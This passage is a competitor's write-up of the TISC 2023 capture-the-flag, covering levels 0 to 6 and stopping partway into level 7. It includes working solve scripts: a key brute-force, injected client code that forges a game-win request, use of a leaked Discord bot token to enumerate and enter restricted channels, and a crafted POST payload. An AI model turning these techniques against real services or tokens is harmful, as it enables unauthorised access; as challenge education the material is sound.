Palindrome, everyone’s favourite cybercrime syndicate, is back for TISC 2023. I managed to solve all 10 challenges this year and clinch 2nd place. Here are my write-ups for all 10 levels.

Level 0

Before we begin, we’ll need you to fill up this survey for us to understand more about you. The flag for level 0 will be revealed immediately upon submission of the form.

We are given the link to what appears to be a survey form, located on a “form.gov.sg” domain. Wanting to avoid burning my FormSG zero days, I decided to take a deeper look at the form. The form asks for our full name, email, gender, and current employment status. Ignoring my suspicions that this was a phishing attempt by Palindrome, I filled up those 4 questions. This revealed 9 more questions that were previously hidden. Luckily, many of these questions could be googled (like “Have you heard of CSIT before?”), allowing me to hastily fill the form up.

Clicking the “Submit now” button at the bottom of the page leaks the flag: TISC{ch4lleng3_beg1ns_n0w}

Overall, this was a fun challenge. I am proud to have done my part against Palindrome.

Level 1

Disk Archaeology (Forensics)

Unknown to the world, the sinister organization PALINDROME has been crafting a catastrophic malware that threatens to plunge civilization into chaos. Your mission, if you choose to accept it, is to infiltrate their secret digital lair, a disk image exfiltrated by our spies. This disk holds the key to unraveling their diabolical scheme and preventing the unleashing of a suspected destructive virus. Attached files: challenge.tar.xz

1
2
$ file challenge.img
challenge.img: Linux rev 1.0 ext4 filesystem data, UUID=2b4fee55-fd5f-483c-a85f-856944731f0f (needs journal recovery) (extents) (64bit) (large files) (huge files)

We load the disk image into Autopsy and find results under the deleted files tab.

Let’s try to recover the deleted files using photorec. Using all default options, we get the following:

1
2
3
4
5
6
7
8
9
PhotoRec 7.1, Data Recovery Utility, July 2019              
Christophe GRENIER <grenier@cgsecurity.org>
https://www.cgsecurity.org                                                                                                                                     
Disk challenge.img - 1073 MB / 1024 MiB (RO)
     Partition                  Start        End    Size in sectors
   P ext4                     0   0  1   130 138  8    2097152                                                                                         
                                                                                                                               
1 files saved in /home/kali/Desktop/tisc23/lvl1/recup_dir directory.                        
Recovery completed.

We managed to recover a binary. Running it reveals the entire flag:

1
2
$ ./f1315992.elf 
TISC{w4s_th3r3_s0m3th1ng_l3ft_ubrekeslydsqdpotohujsgpzqiojwzfq}

Level 2

XIPHEREHPIX’s Reckless Mistake (Crypto)

Our sources told us that one of PALINDROME’s lieutenants, XIPHEREHPIX, wrote a special computer program for certain members of PALINDROME. We have somehow managed to get a copy of the source code and the compiled binary. The intention of the program is unclear, but we think encrypted blob inside the program could contain a valuable secret. Attached files: prog.c XIPHEREHPIX

Let’s look at the source provided.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
int main(int argc, char **argv)
{
    char password[MAX_PASSWORD_SIZE + 1] = { 0 };
    int password_length;

    unsigned char key[32];

    printf("Hello PALINDROME member, please enter password:");

    password_length = input_password(password);
    if (password_length < 40) {
        printf("The password should be at least 40 characters as per PALINDROME's security policy.\n");
        exit(0);
    }

    if (!verify_password(password, password_length)) {
        initialise_key(key, password, password_length);
        show_welcome_msg(key);
    }
        
    else {
        printf("Failure! \n");
        exit(0);
    }
}

show_welcome_msg() likely reveals the flag in: printf("Welcome PALINDROME member. Your secret message is %.*s\n", plaintext_length, plaintext);. Let’s look at the verify_password check:

1
2
3
4
5
6
7
8
    calculate_sha256(mdVal, password, password_length);

    uint64_t hash[] = { 0x962fe02a147163af,
                        0x8003eb5b7ff75652,
                        0x3220981f9f027e35,
                        0xfb933faadd7944b7};

    return memcmp(mdVal, hash, 32);

So, our password needs to match one of the SHA256 hashes from a known set. Next, let’s look at the initialize_key() function.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
void initialise_key(unsigned char *key, char *password, int password_length) {
    const char *seed = "PALINDROME IS THE BEST!";
    int i, j;
    int counter = 0;

    uint256_t *key256  = (uint256_t *)key;

    key256->a0 = 0;
    key256->a1 = 0;
    key256->a2 = 0;
    key256->a3 = 0;

    uint256_t arr[20] = { 0 };

    calculate_sha256((unsigned char *) arr, (unsigned char *) seed, strlen(seed));

    for (i = 1; i < 20; i++) {
        calculate_sha256((unsigned char *)(arr+i), (unsigned char *) (arr+i-1), 32);
    }

    for (i = 0; i < password_length; i++) {
        int ch = password[i];
        for (j = 0; j < 8; j++) {
            counter = counter % 20;

            if (ch & 0x1) {
                accumulate_xor(key256, arr+counter);
            }

            ch = ch >> 1;
            counter++;
        }
    }
}

There’s quite a bit of code, but let’s just examine the portion where password is actually used. For every bit of each character in the password, if the bit is a 1, it calls an accumulate_xor() function on arr+counter, which is an element in an array. Importantly, notice that we can isolate the effect of password to just whether the function is called, since all the other variables are independent of it. accumulate_xor() essentially XORs the two arguments. Due to the properties of XOR, if we call it with the same arr+counter value twice, key256 remains unchanged.

Consequently, we can treat the system as follows: for each either element of arr, we either XOR it against key256 (accumulate_xor() is called an odd number of times with it as an argument) or we don’t (even number of calls). Due to the commutativity of XOR, we can bruteforce all possible combinations 2**20, where 2 is the number of possibilities (either we XOR it against a given key, or we don’t) and 20 is the total number of keys. We can check that the key is correct by checking if the output of the show_welcome_msg() function returns a message with the prefix TISC.

Here’s a snippet:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
void hack_key()
{
    unsigned char key[32];

    const char *seed = "PALINDROME IS THE BEST!";
    uint256_t arr[20] = {0};
    calculate_sha256((unsigned char *)arr, (unsigned char *)seed, strlen(seed));
    for (int i = 1; i < 20; i++)
    {
        calculate_sha256((unsigned char *)(arr + i), (unsigned char *)(arr + i - 1), 32);
    }

    long xor_count = 0, xor_count_limit = 1048576;  // 2**20
    char xors[20] = {0};
    while (xor_count < xor_count_limit)
    {
        long temp = xor_count;
        int j = 0;
        while (j < 20)  // use some bit tricks to iterate over all combinations
        {
            xors[j++] = temp & 1;
            temp = temp >> 1;
        }
        initialise_key_hack(key, xors, arr);  // xors the key according to the array xors
        if (check_key(key) == 1)  // uses strncmp
        {
            puts("win");
            show_welcome_msg(key);
            break;
        }
        xor_count++;
    }
}

Flag: TISC{K3ysP4ce_1s_t00_smol_d2g7d97agsd8yhr}

Level 3

KPA (Mobile)

We’ve managed to grab an app from a suspicious device just before it got reset! The copying couldn’t finish so some of the last few bytes got corrupted… But not all is lost! We heard that the file shouldn’t have any comments in it! Help us uncover the secrets within this app! Attached files: kpa.apk

With a hint from the challenge description, we can notice that the APK is truncated and won’t decompile with the usual tools. To bypass this, I used a hack of adding bytes after the end of the APK so that it would at least decompile. I added 100 null bytes and JADX and apktool managed to decompile it without throwing errors.

Note: This method is quite hacky as we won’t actually manage to run the APK. The ideal method would be to fix the APK.

Looking through the source code, we see that there is a password check. It is length 25 and run against SHA1 1024 times, so there is no way to brute force this.

Hide/show code
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
public void M(String str) {
	char[] charArray = str.toCharArray();
	String valueOf = String.valueOf(charArray);
	for (int i2 = 0; i2 < 1024; i2++) {
		valueOf = N(valueOf, "SHA1");
	}
	if (!valueOf.equals("d8655ddb9b7e6962350cc68a60e02cc3dd910583")) {
		((TextView) findViewById(d.f3935f)).setVisibility(4);
		Q(d.f3930a, 3000);
		return;
	}
	char[] copyOf = Arrays.copyOf(charArray, charArray.length);
	charArray[0] = (char) ((copyOf[24] * 2) + 1);
	charArray[1] = (char) (((copyOf[23] - 1) / 4) * 3);
	charArray[2] = Character.toLowerCase(copyOf[22]);
	charArray[3] = (char) (copyOf[21] + '&');
	charArray[4] = (char) ((Math.floorDiv((int) copyOf[20], 3) * 5) + 4);
	charArray[5] = (char) (copyOf[19] - 1);
	charArray[6] = (char) (copyOf[18] + '1');
	charArray[7] = (char) (copyOf[17] + 18);
	charArray[8] = (char) ((copyOf[16] + 19) / 3);
	charArray[9] = (char) (copyOf[15] + '%');
	charArray[10] = (char) (copyOf[14] + '2');
	charArray[11] = (char) (((copyOf[13] / 5) + 1) * 3);
	charArray[12] = (char) ((Math.floorDiv((int) copyOf[12], 9) + 5) * 9);
	charArray[13] = (char) (copyOf[11] + 21);
	charArray[14] = (char) ((copyOf[10] / 2) - 6);
	charArray[15] = (char) (copyOf[9] + 2);
	charArray[16] = (char) (copyOf[8] - 24);
	charArray[17] = (char) (copyOf[7] + Math.pow(4.0d, 2.0d));
	charArray[18] = (char) ((copyOf[6] - '\t') / 2);
	charArray[19] = (char) (copyOf[5] + '\b');
	charArray[20] = copyOf[4];
	charArray[21] = (char) (copyOf[3] - '\"');
	charArray[22] = (char) ((copyOf[2] * 2) - 20);
	charArray[23] = (char) ((copyOf[1] / 2) + 8);
	charArray[24] = (char) ((copyOf[0] + 1) / 2);
	P("The secret you want is TISC{" + String.valueOf(charArray) + "}", "CONGRATULATIONS!", "YAY");
}

This suggests that we can leak the correct password from somewhere in the binary. Looking through the files decompiled by apktool, we notice an external native code library, libkappa.so. Notice also that the MainActivity() in the APK references a function from libkappa.so, but never uses its value. I theorised that this will give us the key.

1
2
3
4
5
6
7
8
9
10
11
12
13
package com.tisc.kappa;
public class sw {
    static {
        System.loadLibrary("kappa");
    }
    public static void a() {
        try {
            System.setProperty("KAPPA", css());
        } catch (Exception unused) {
        }
    }
    private static native String css();
}

Let’s try to figure out what the native library’s css() function returns. My approach here will likely be quite different from most who would opt for dynamic analysis (writing your own APK and importing the native code library would likely have just printed the flag). Instead, since my Android Studio build was broken, I took a static analysis route instead. Opening, libkappa.so in Ghidra, we can analyze the JNI_OnLoad function:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
undefined8 JNI_OnLoad(long *param_1) {
  [...]  
  iVar2 = (**(code **)(*param_1 + 0x30))(param_1,&local_30,0x10006);
  uVar3 = 0;
  if (iVar2 == 0) {
    local_48 = 0x22;
    local_47 = 0x2f6d6f63;
    uStack67 = 0x63736974;
    uStack63 = 0x70616b2f;
    uStack59 = 0x732f6170;
    uStack55 = 0x77;
    local_5f[0] = 0x737363;  // string CSS
    uVar3 = (**(code **)(*local_30 + 0x30))(local_30,&local_47);
    cVar1 = (**(code **)(*local_30 + 0x720))();
    if (cVar1 == '\0') {
      local_28 = local_5f;
      local_20 = "()Ljava/lang/String;";
      local_18 = some_ptr;
      (**(code **)(*local_30 + 0x6b8))(local_30,uVar3,&local_28,1);
      uVar3 = 0x10006;
    }
[...]

Clicking through some of the functions, we notice a function pointer (that I renamed some_ptr) to 0x1201f0. This function does some weird looking string checks with some XORs, so this is unlikely to be boilerplate code. Furthermore, the lengths of the decrypted strings sum to 25. This strongly suggests that this function will return the correct password.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
[...]
  do {
                    /* MOD 5 */
    xor_byte = (int)(char)xor_byte + (int)i;
    if ((int)i == (i_prime / 5) * 5) {
      xor_byte = 0x60;
    }
    str_buffer[i] = str_buffer[i] ^ (byte)xor_byte;
    count = i + 2;
    i_prime = i_prime + 1;
    i = i + 1;
  } while (count < 0xd);  // length 1 is 0xd (13)
  local_48 = (basic_string.conflict)0x18;
  str_buffer2._0_7_ = 0x100f091b190957;
  str_buffer2[7] = '\n';
  str_buffer2._8_4_ = 0x7309190e;
  xor_byte = 0x1c;
  count = 0;
  do {
    str_buffer2[count] = str_buffer2[count] ^ (byte)xor_byte;
    xor_byte = (int)(char)(byte)xor_byte + (int)count;
    if ((int)count == (count_prime / 3) * 3) {
      xor_byte = 0x48;
    }
    count = count + 1;
    count_prime = count_prime + 1;
  } while (count < 0xc);  // length 2 is 0xc (12), summing to give 25

I recreated the decryption function in C to obtain the password of “ArBraCaDabra?KAPPACABANA!”. Finally, I recreated the Java decryption function from the APK in Python too, using the password to obtain the flag.

Hide/show code
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
import hashlib
def cycle(input):
    for _ in range(1024):
        input = hashlib.sha1(input).hexdigest().encode("ascii")
    return input

input = b"ArBraCaDabra?KAPPACABANA!"
pbHash = cycle(input).decode("ascii")

charArray = [0] * 25
copyOf = input
def tlc(i):
    return ord(chr(i).lower())

charArray[0] =  ((copyOf[24] * 2) + 1)
charArray[1] =  (((copyOf[23] - 1) / 4) * 3)
charArray[2] = tlc(copyOf[22])
charArray[3] =  (copyOf[21] + ord('&'))
charArray[4] =  (((copyOf[20] // 3) * 5) + 4)
charArray[5] =  (copyOf[19] - 1)
charArray[6] =  (copyOf[18] + ord('1'))
charArray[7] =  (copyOf[17] + 18)
charArray[8] =  ((copyOf[16] + 19) / 3)
charArray[9] =  (copyOf[15] + ord('%'))
charArray[10] =  (copyOf[14] + ord('2'))
charArray[11] =  (((copyOf[13] / 5) + 1) * 3)
charArray[12] =  (((copyOf[12] // 9) + 5) * 9)
charArray[13] =  (copyOf[11] + 21)
charArray[14] =  ((copyOf[10] / 2) - 6)
charArray[15] =  (copyOf[9] + 2)
charArray[16] =  (copyOf[8] - 24)
charArray[17] =  (copyOf[7] + 4.0**2.0)
charArray[18] =  ((copyOf[6] - ord('\t')) / 2)
charArray[19] =  (copyOf[5] + ord('\b'))
charArray[20] = copyOf[4]
charArray[21] =  (copyOf[3] - ord('\"'))
charArray[22] =  ((copyOf[2] * 2) - 20)
charArray[23] =  ((copyOf[1] / 2) + 8)
charArray[24] =  ((copyOf[0] + 1) / 2)
print("TISC{" + str(bytes([int(k) % 256 for k in charArray]).decode("ascii")) + "}")

Flag: TISC{C0ngr@tS!us0lv3dIT,KaPpA!}

Level 4

Really Unfair Battleships Game (Pwn, Misc)

After last year’s hit online RPG game “Slay The Dragon”, the cybercriminal organization PALINDROME has once again released another seemingly impossible game called “Really Unfair Battleships Game” (RUBG). This version of Battleships is played on a 16x16 grid, and you only have one life. Once again, we suspect that the game is being used as a recruitment campaign. So once again, you’re up! Things are a little different this time. According to the intelligence we’ve gathered, just getting a VICTORY in the game is not enough. PALINDROME would only be handing out flags to hackers who can get a FLAWLESS VICTORY. Attached files: rubg_1.0.0.exe rubg-1.0.0.AppImage

From the challenge description and a brief reversing of the binary, we realise that the binary uses the FUSE filesystem for storing its files. We can extract the filesystem using binwalk.

1
2
3
4
5
6
7
8
9
10
11
12
$ binwalk -D=".*" rubg-1.0.0.AppImage 

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
140480        0x224C0         SHA256 hash constants, little endian
140952        0x22698         xz compressed data
140992        0x226C0         CRC32 polynomial table, little endian
188392        0x2DFE8         Squashfs filesystem, little endian, version 4.0, compression:gzip, size: 103570199 bytes, 95 inodes, blocksize: 131072 bytes, created: 2023-07-17 15:38:20
$ unsquashfs 2DFE8
Parallel unsquashfs: Using 4 processors
85 inodes (2006 blocks) to write
[...]

Examining the filesystem, we can easily figure out that the game is an Electron app, with its code in resources/app.asar archive. We can extract it with: asar extract app.asar out_folder. Browsing through the JS code files, we conclude that the game logic resides in the the index-c08c228b.js file. We parse the heavily obfuscated code through a deobfuscator and analyze the result. It seems like most of the game logic lies towards the end of the file. Here’s a snippet of partially deobfuscated code:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
const bomb_wav = "" + new URL("bomb-47e36b1b.wav", import.meta.url).href,
  gameover_wav = "" + new URL("gameover-c91fde36.wav", import.meta.url).href,
  victory_wav = "" + new URL("victory-3e1ba9c7.wav", import.meta.url).href,
  it = (e) => (Hi("data-v-66546397"), (e = e()), $i(), e),
  zu = { key: 0 },
  Wu = it(() =>
    W(
      "div",
      { class: "connection-test" },
      [
        W("h1", null, "Testing Connection with Server..."),
        W(
          "span",
          { class: "subtitle" },
          "(if this message persists, please ensure you have a stable internet connection and restart your client.)"
        ),
      ],
      -1
    )
  ),

The variables referencing the three audio files are useful, as whenever these variables are referenced, we can understand a bit more about the context. For instance, if the gameover_wav variable is used in a portion of the code, we can assume that portion relates to when the player loses the game, and tease apart the game logic accordingly. Looking for references to victory_wav, we find the following interesting section:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
  async function m(x) {
    if (d(x)) {
      if (
        ((t.value[Math.floor(x / 16)] ^= 1 << x % 16),
        (l.value[x] = 1),
        new Audio(bomb_wav).play(),
        c.value.push(
          `${n.value.toString(16).padStart(16, "0")[15 - (x % 16)]}${
            r.value.toString(16).padStart(16, "0")[Math.floor(x / 16)]
          }`
        ),
        t.value.every((_) => _ === 0))
      )
        if (
          JSON.stringify(c.value) === JSON.stringify([...c.value].sort())
        ) {
          const _ = { a: [...c.value].sort().join(""), b: s.value };
          (i.value = 101),
            (o.value = (await $u(_)).flag),
            new Audio(victory_wav).play(),
            (i.value = 4);
        } else (i.value = 3), new Audio(victory_wav).play();
    } else (i.value = 2), new Audio(gameover_wav).play();
  }

This function seems to determine whether we win or not and plays the corresponding audio. It seems that the only check we need to pass is JSON.stringify(c.value) === JSON.stringify([...c.value].sort(). We can add debugging statements in this section and play the game to verify that it is indeed this check that fails us.

From here on out, we can do a bit more reversing to figure out the rest of the function. Here’s a deobfuscated version:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
async function click(idx) {
        if (tile_is_safe(idx)) {
          if (
            ((tiles.value[Math.floor(idx / 16)] ^= 1 << idx % 16),
            (grid_isclicked.value[idx] = 1),
            new Audio(bomb_wav).play(),
            clicked.value.push(
              `${n.value.toString(16).padStart(16, "0")[15 - (idx % 16)]}${
                r.value.toString(16).padStart(16, "0")[Math.floor(idx / 16)]
              }`
            ),
            tiles.value.every((_) => _ === 0)) // Every tile is 0
          )
              /* this is a victory, but is it a flawless one? continue the check */
            if (
              JSON.stringify(clicked.value) ===
              JSON.stringify([...clicked.value].sort())
            ) {
              // WIN CONDITION: the order of play is exactly as sorted
              // BYPASS: we can just send _ with the sorted answer.
              const _ = { a: [...clicked.value].sort().join(""), b: s.value };
              (i.value = 101),
                (o.value = (await fetch_solve(_)).flag),
                new Audio(victory_wav).play(),
                (i.value = 4);
            } else (i.value = 3), new Audio(victory_wav).play(); // non-flawless victory
        } else (i.value = 2), new Audio(gameover_wav).play(); // loss
      }

So, there are 3 different ways the game can end: loss (gameover_wav is played); non-flawless victory (victory_wav is played); flawless victory (victory_wav is played and the flag is also fetched). The condition for a victory is that all the tiles are 0, in other words, we have sank every ship successfully. We can see that the condition for a flawless victory is that the order of clicked matches its sorted order exactly. Looking further back in the function, clicked is an array populated by values corresponding to the squares we click on.

If the condition for a flawless victory is met, we send the clicked array to the game server, which will return us the flag. We know the elements that clicked needs to have – the values corresponding to the squares that have ships behind them. This information is available client-side, as the server sends it to initialize the game (this can be found through more reversing and debugging of the connection protocol). To game the system, we can simply automatically populate the clicked array with the correct values, then sort it, and send it to the server.

Here’s the solution snippet that I injected into the source:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
// We construct ships by intercepting the initialization data sent by the server
for (let ship of ships) {
  let i = ship[0],
    j = ship[1];
  let x = i + j * 16;
  clicked.value.push(
    `${n.value.toString(16).padStart(16, "0")[15 - (x % 16)]}${
      r.value.toString(16).padStart(16, "0")[Math.floor(x / 16)]
    }`
  );
}

// This is the structure of what we send to `fetch_solve`, based on debugging the real request.
const _ = { a: [...clicked.value].sort().join(""), b: s.value };
i.value = 101;
let flag = (await fetch_solve(_)).flag;
console.log(flag);

Flag: TISC{t4rg3t5_4cqu1r3d_fl4wl355ly_64b35477ac}

Level 5

PALINDROME’s Invitation (Osint, Misc)

Valuable intel suggests that PALINDROME has established a secret online chat room for their members to discuss on plans to invade Singapore’s cyber space. One of their junior developers accidentally left a repository public, but he was quick enough to remove all the commit history, only leaving some non-classified files behind. One might be able to just dig out some secrets of PALINDROME and get invited to their secret chat room…who knows? Start here: https://github.com/palindrome-wow/PALINDROME-PORTAL

The Github repo has a workflow action in test_portal.yml, referencing a secret portal URL and password.

Looking at the logs for the Github actions taken (under the ‘Actions’ tab in the repository), we see that the action errored out with the following logs:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
Run C:\msys64\usr\bin\wget.exe '''***/***''' -O test -d -v
Setting --verbose (verbose) to 1
DEBUG output created by Wget 1.21.4 on cygwin.

Reading HSTS entries from /home/runneradmin/.wget-hsts
URI encoding = 'ANSI_X3.4-1968'
logging suppressed, strings may contain password
--2023-09-08 04:01:29--  ***/:dIcH:..uU9gp1%3C@%3C3Q%22DBM5F%3C)64S%3C(01tF(Jj%25ATV@$Gl
Resolving chals.tisc23.ctf.sg (chals.tisc23.ctf.sg)... 18.143.127.62, 18.143.207.255
Caching chals.tisc23.ctf.sg => 18.143.127.62 18.143.207.255
Connecting to chals.tisc23.ctf.sg (chals.tisc23.ctf.sg)|18.143.127.62|:45938... Closed fd 4
failed: Connection timed out.
Connecting to chals.tisc23.ctf.sg (chals.tisc23.ctf.sg)|18.143.207.255|:45938... Closed fd 4
failed: Connection timed out.
Releasing 0x0000000a00027870 (new refcount 1).
Retrying.

From this, we can see that wget failed to access the secret portal. As a result, it produced error logs, leaking the IP for the secret portal (18.143.127.62) and the password :dIcH:..uU9gp1%3C@%3C3Q%22DBM5F%3C)64S%3C(01tF(Jj%25ATV@$Gl. Notice that the URL for the site is hidden as it is a secret, which are redacted by default in Github’s logs.

Warning: GitHub automatically redacts secrets printed to the log, but you should avoid printing secrets to the log intentionally.

Interestingly, the password is not redacted. I spoke to the challenge creator after solving the challenge and he mentioned:

aliencaocao: their censorship is only plaintext aliencaocao: it doesnt consider escape strings

Anyway, we can use the IP 18.143.127.62:45938 to directly access the portal, and enter the password, redirecting us to a /check page with the following source code:

1
2
3
<a href=https://discord.gg/2cyZ6zpw7J>Welcome!</a>
<!-- MTEyNTk4MjIyOTg2OTM4MzgyMQ.GSNPL4.nSrr79qjf9QYY2o4ZGZhTcHzhqHH84RTfp_DCo -->
<!-- You have 15 minutes before this token expires! Find a way to use it and be fast! You can always re-enter the password to get a new token, but please be considerate, it is highly limited. -->

We obtain a Discord link and (what appears to be) a Discord API token. I joined the server using my personal account but everything was restricted – I couldn’t send nor read messages in any channel. Next, I tried to use the API token to interact with the Discord API directly. I first enumerated the channels (since my personal account couldn’t even view what channels there were)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
token = "MTE1MjUzNjk4Njk3NzA2MjkxMg.GGxJH8.I6kM8JX8gftTdyvzWj-Po2UEfO5OcliiWKy5Sk"
guild_id = "1130166064710426674"

def access(url, method=get, data=None, auth_prefix="Bot "):
    print(f"Accessing {url}")
    prefix = "https://discord.com/api/v10"
    url = prefix + url
    if data != None:
        r = method(url, headers={
            # "Content-Type": "application/json",
            "authorization": f"{auth_prefix}{token}"
        }, json=data)
    else:
        r = method(url, headers={
            "authorization": f"{auth_prefix}{token}"
        })
    print(r.text)
    print(r.status_code)
    return r.text

def get_channels():
    access(f"/guilds/{guild_id}/channels")

This reveals a channel called “flag” that we still have insufficient permissions to access. I also went down a wild goose chase of finding a Discord thread with a conversation referencing client_id 1076936873106231447 and 66688. Enumerating further, we find that this client_id corresponds to a bot called BetterInvites. This bot has the ability to generate invite links with associated permissions, which seems to be exactly what we need. If we can use a more powerful invite link to grant us more permissions, we will be able to read the “flag” channel.

The key step I took was to look at our the user’s (the user associated with the API key) permissions. We can find the user’s roles using the API, and subsequently the permissions associated with our roles.

1
2
3
4
5
6
7
Accessing /guilds/1130166064710426674/members/1152536986977062912
{"avatar":null,"communication_disabled_until":null,"flags":0,"joined_at":"2023-09-16T09:32:54.624000+00:00","nick":null,"pending":false,"premium_since":null,"roles":["1152537590130540595","1132168029329965076"],"unusual_dm_activity_until":null,"user":{"id":"1152536986977062912","username":"PALINDROME'S secretary 19","avatar":null,"discriminator":"2773","public_flags":0,"flags":0,"bot":true,"banner":null,"accent_color":null,"global_name":null,"avatar_decoration_data":null,"banner_color":null},"mute":false,"deaf":false}

[...]
{'id': '1132168029329965076', 'name': "PALINDROME'S SECRETARIES", 'description': None, 'permissions': '1152', 'position': 12, 'color': 6323595, 'hoist': False, 'managed': False, 'mentionable': False, 'icon': None, 'unicode_emoji': None, 'flags': 0}
{'id': '1152537590130540595', 'name': "PALINDROME'S secretary 19", 'description': None, 'permissions': '66688', 'position': 1, 'color': 0, 'hoist': False, 'managed': True, 'mentionable': False, 'icon': None, 'unicode_emoji': None, 'tags': {'bot_id': '1152536986977062912'}, 'flags': 0}
[...]

So, we have the permissions 1152 and 66688. Using an online Discord permissions calculator, we see that 66688 corresponds to the abilities: “Read Messages/View Channels”, “View Audit Log”, “Read Message History”. Interesting, let’s check out the audit log.

I used a 3rd-party bot client to view the audit logs.

Here, we see the invite code generated with the permission to view the channel “flag. Using it to join the server on our personal account, we can finally read the flag.

It should have been possible to use the API to read the audit logs, but I couldn’t seem to find the logs corresponding to the invite code when I made my request. Hence, I chose to try a 3rd-party client app, when I probably should have used the official Discord library instead

Flag: TISC{H4ppY_B1rThD4y_4nY4!}

Level 6

4D (RE, Pwn)

Our forensics team managed to find a memory dump from one of the compromised systems, containing their binary executable. Determine how it works in order to stop them and protect the integrity of the 4D lottery system. http://chals.tisc23.ctf.sg:48471 Attached files: 4d

We are provided a Vlang binary that starts up a web server. At first glance, the server seems to just produce 5 random 4D numbers whenever you refresh the page.

This is a standard reversing challenge, albeit written in an uncommon langauge. I don’t think there’s much value in explaining the whole reversing / dynamic analysis process. Instead, I’ll just paste my notes here

  • At the start, vinit() gets called. This is a large function that ghidra fails to decompile. Here, rand__init() is called, which initializes the default_rng with a time seed. default_rng is subsequently used in generating random numbers, e.g. in rand__int()
  • The following logic gets run for each of the 5 4D numbers produced.
    • 005eefcb: 4 1-byte ints are generated using rand__int() and modulo. This sets up init_nums[0..4]
    • 005ef127: The memmove runs 8 times, duplicating init_nums to create 32 numbers in total (let’s call this init_vec)
    • 005ef1d1: After this instruction, we go into a loop to transform the 32 numbers (init_vec). This does the following operations:
      1
      2
      3
      4
      
      for i in range(32):
        in = init_vec[i], prev = init_vec[i - 1]  # if i > 0
        in = (in + 5) ^ i + 1
        in ^= prev  # if i > 0
      
    • 005ef432: init_vec is stringified using Array_u8_str()
    • 005ef4cc: main__compare() is our win condition, where our init_vec string is compared against a set of values that can be extracted from the binary. I assumed that main__compare() is a win condition due to the amount of string comparisons there were in it. In fact, forging a pass in main__compare() reveals a fake flag locally. This suggests that passing the same check on the remote server would reveal the real flag.

Doing a bit more reversing, we find a “handle_inpt” handler which gets called when we make a POST request to the site. This does pass[cookie_id] = input, where pass is a Vlang map (simliar to maps in other languages), cookie_id is the value of the id cookie we pass in, and input is the path we send, i.e. POST "http://chals.tisc23.ctf.sg:48471/{input}". input then ‘replaces’ the value of init_vec in subsequent runs, meaning that we can easily control init_vec.

Then, all that is left is to find the correct value for init_vec so that it can pass the main__compare() check after we run the transformation above. We can use z3 for this:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
from z3 import *

inp = []
for i in range(32):
    byte = BitVec(str(i), 8)
    inp.append(byte)

z = Solver()

desired = ['0x6a', '0x1', '0x64', '0x2d', '0x5e', '0x60', '0x17', '0x2e', '0x75', '0x28', '0x11', '0x68', '0x2b', '0x13', '0x54', '0x6e', '0x25', '0x68', '0x28', '0x0', '0x3f', '0x57', '0x3b', '0x7e', '0x5b', '0x14', '0x78', '0x1c', '0x57', '0x16', '0x6e', '0x76']
desired = [int(c, 16) for c in desired]

out = [0] * 32
for i in range(32):
    out[i] = ((inp[i] + 5) ^ i + 1)
    if i > 0:
        out[i] ^= out[i-1]

    z.add(out[i] == desired[i])

if z.check() == sat:
    print(f"Condition satisfied: {z.check}")
    solution = z.model()
    flag = []
    for i in range(32):
        flag.append(int(str(solution[inp[i]])))
    
    print(flag)
else:
    print("failed...")

Finally, we can wrap this in a solve script:

1
2
3
4
5
6
7
from requests import *
url = "http://chals.tisc23.ctf.sg:48471/"
cookie = "65b2c832-8426-4c4e-a05c-dc6e2d2f7d9d"  # paste this in from a manual access of remote
values = [102, 100, 97, 72, 113, 51, 107, 44, 77, 82, 45, 112, 73, 49, 67, 37, 85, 90, 78, 55, 37, 121, 118, 88, 55, 80, 114, 115, 81, 90, 98, 51]
payload = "".join([chr(x) for x in values])
r = post(f"{url}{payload}", cookies = {"id": cookie})
print(r.text)

Flag: TISC{Vlang_R3v3rs3_3ng1n333r1ng}

Level 7

The Library (RE, Pwn)

In a place filled with palindromes everywhere, find the hidden palindrome code with the right configuration. nc chals.tisc23.ctf.sg 26195 Attached files: TheLibrary.elf

This pwnable is a C++ ELF binary. We are given options to create, view, edit, delete bookshelves, CD stands, brochure stands and newspaper stands, and in turn we can perform similar operations on their elements (bookshelve rows, CD stand rows etc). It’s essentially the classic heap menu challenge on steroids – I spent longer reversing it than actually exploiting it.

After reversing, the vulnerability becomes quite clear. The binary uses a “custom memory allocator” that allocates chunks of 0x100 bytes from a large 0x25000 sized mmap-chunk (let’s call this large_25000). The catch is that the chunks are allocated in random order, meaning that the first allocation may receive a chunk at offset +0x3700, and the next allocation at +0x1500. The first long of the chunk represents whether the chunk is currently in use or not. It is set to 1 (unused) by default, 0 (in use) when allocated, and back to 1 when it is ‘freed’. The vulnerability lies in that for each of the aforementioned library structs, some fields are left uninitialized. Furthermore, when chunks are freed, not all data is cleared. This opens up the possibility of previous chunk data merging into current chunk data. There is also a 2nd mmap-ed chunk of size 0x50000 (let’s call this massive_50000) which allocates memory sequentially (essentially a bump allocator). This allocates chunks for the sub-elements of the main structs, e.g. BookshelfRow. We can’t exploit this allocator because it doesn’t re-use old chunks.

